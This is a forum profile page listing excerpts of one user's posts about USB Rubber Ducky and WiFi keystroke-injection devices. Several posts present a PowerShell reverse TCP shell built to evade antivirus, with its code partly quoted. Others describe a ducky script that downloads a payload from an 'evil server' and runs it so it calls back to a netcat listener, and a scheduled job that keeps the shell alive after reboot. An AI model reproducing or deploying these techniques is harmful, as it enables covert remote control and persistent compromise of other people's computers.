Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About basic4

  • Rank
    Hak5 Fan

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

  1. Wifi Rubber Ducky with file download capability maybe?
  2. Using a Scheduled Job to make the Reverse Powershell Survive Reboot I've added a couple of lines to the powershell ducky script that schedules the reverse shell script to re-start after boot-up and logon by the user. This now gives us connection resilience and some degree of permanence, allowing the shell to reconnect to the server around 50 secs after a logon by our hijacked user. REM Opens a reverse shell to back to netcat on REM Downloads payload from a webserver on (see PS_TCP4.ps1 script) REM MAP UK - for WifiDucky only. DELAY 2000
  3. Hi Zibri - Yes. You'd need to install the serial drivers via a script (powershell etc) to get full 2-way communication.
  4. illwill - Nice that download isn't required on your script. I think I'll make a hybrid to get a non-download one, but still retain error control and connection recovery. I've also found a way to survive target reboot. Tested it yesterday and it works on Win7. Still need to confirm it will work on Win10. I'll post it up later today.
  5. WATSEE: As for the keyboard layout issue (US/UK) - I think the easiest way would be to alter the bash script to pickup a locale identifier (eg. 'MAP UK' or 'MAP US') and translate the 6-8 character differences between the two keyboard types. I had to do the same with other Arduino 'Ducky' projects I worked on. If I get time in the next few days, I'll do that and post it back here. Edit: Looks like you'd maybe better trying something like 'setxkbmap gb' as you'd need to change both the duckpi.sh and the C file. (I wonder why the originators wrote it that way - seems a bit limited.)
  6. Better to parameterise the destination address and port of the attacker machine in the powershell script. Makes things easier to change dynamically - if required. Example : ./PS_TCP4.ps1 -dest -port 6673 param([String]$dest, [Int32]$port ); while (1 -eq 1) { $ErrorActionPreference = 'Continue'; try { #attempt inital connection $client = New-Object System.Net.Sockets.TCPClient($dest,$port); $stream = $client.GetStream(); [byte[]]$bytes = 0..255|%{0}; $sendbytes = ([text.encoding]
  7. Hi - Are you in the UK? - If so, you need to change the key mapping when encoding your script. See international keyboards in the ducky docs. Regards, basic4.
  8. I've used the powershell script above (PSD_TCP4.ps1) in a ducky script and it works perfectly on Win7 & 10! Setup Set up my 'evil server' on a Raspberry Pi3 (webserver on port 80 and netcat listening on port 6673) The ducky script then runs on a windows 7/10 target: 1. Opens powershell on the target. 2. Downloads the reverse shell payload script. 3. Executes it thus forming a link back to netcat running on the Raspberry Pi3. Ducky script: REM Opens a reverse shell to back to netcat on REM Downloads payload from a webserver on 19
  9. Hi - A ducky only works if the user IS logged in AND the screen isn't locked. Using a ducky requires that the user has walked away from the target machine without locking it. Or if you can distract the user from the screen for the amount of time needed to insert the ducky and run its script. When a machine is locked, can you use the keyboard? (except to login) - No you need the password - which we don't know. So a Ducky is just a tool to type commands very quickly - that's all. Regards, Basic4.
  10. Reverse TCP Shell using Powershell Only Hi Guys. I was having problems getting a payload for the ducky that wasn't detected by Kaspersky, AVG etc. So I started to look into the possibility of using Powershell only to create a reverse TCP shell. I found some promising base code on a Powershell site and made some additions/adaptations for connection resilience and error handling. Now, the nice thing about this PS script is that it's compatible with a netcat listener! Should be very easy to utilize this via a ducky script on my 'WiDucky'. (Wifi enabled ducky - https://github.com/bas
  11. See the following projects I've built around the Ducky HID attack.. https://github.com/basic4/WiDucky - Wifi Ducky with windows/Python/Android controllers. https://github.com/basic4/USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle - A basic ducky with microSD for under $10. Basic4.
  12. Hi 1. No ducky will work when a machine is locked. That's one of their limitations. 2. Yes - the WiDucky can just sit there and do nothing until you connect to it over WiFi - and send keystrokes. Basic4.
  13. It's all here https://github.com/basic4/WiDuck
  14. It's a good solution. Although I built a wifi ducky based on arduino boards and the ESP8266, since combining both gave the possibility of full speed USB and multiple end points. I built prototypes and used these until I found the 'Cactus Micro' , which is a combination of a Leonardo and ESP8266. Wrote various controllers for Python, .NET and Android. Works well. Since the Atmel chip is recognized as both a HID device and a Serial port, You can (via a script) run command prompt in a windows target, and return the output of the script (via serial) to the duck and then on back to the attacker ma
  • Create New...